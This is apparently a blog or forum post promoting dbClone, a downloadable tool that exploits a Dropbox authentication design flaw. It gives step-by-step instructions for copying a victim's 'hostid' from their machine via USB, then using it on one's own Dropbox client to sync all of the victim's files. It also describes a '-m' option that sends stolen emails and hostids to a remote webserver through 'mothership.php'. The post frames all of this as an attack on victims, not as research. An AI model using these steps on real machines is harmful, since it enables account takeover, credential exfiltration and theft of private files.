Reinventing the weel
Dropbox authentication exploit, dbClone.
After reading this article on dereknewton.com about Dropbox’s insecure design, sablefoxx: a resourceful young coder on the forum created a python application to exploit the insecure design of the most popular file synchronisation tool Dropbox.
Download dbClone from here or on the downloadpage.
 Find a victim machine running Dropbox, insert your USB drive
 Run dbClone.exe, data will be saved in a .txt file
 On your own computer install the Dropbox client and run “dbClone.exe -i”
 Paste in the ‘hostid’ from the .txt file into the ‘hostid’ prompt, enter /any/ email
 Start up the Dropbox client, and sync all the files!!!
But Wait There’s More!:
Use -m to upload the email and hostid to your webserver (via GET),
for example “dbClone.exe -m http://somesite.com” (Note is appends
“mothership.php” to the url), example code in /src/mothership.php!
Tested on Windows 7 & Ubuntu 10.10 but should run on just about any Windows/Linux box without much fuss. They really should fix this problem, also this program can also send the HostIds to a remote web server (for off-site backups of course).
Source code is included.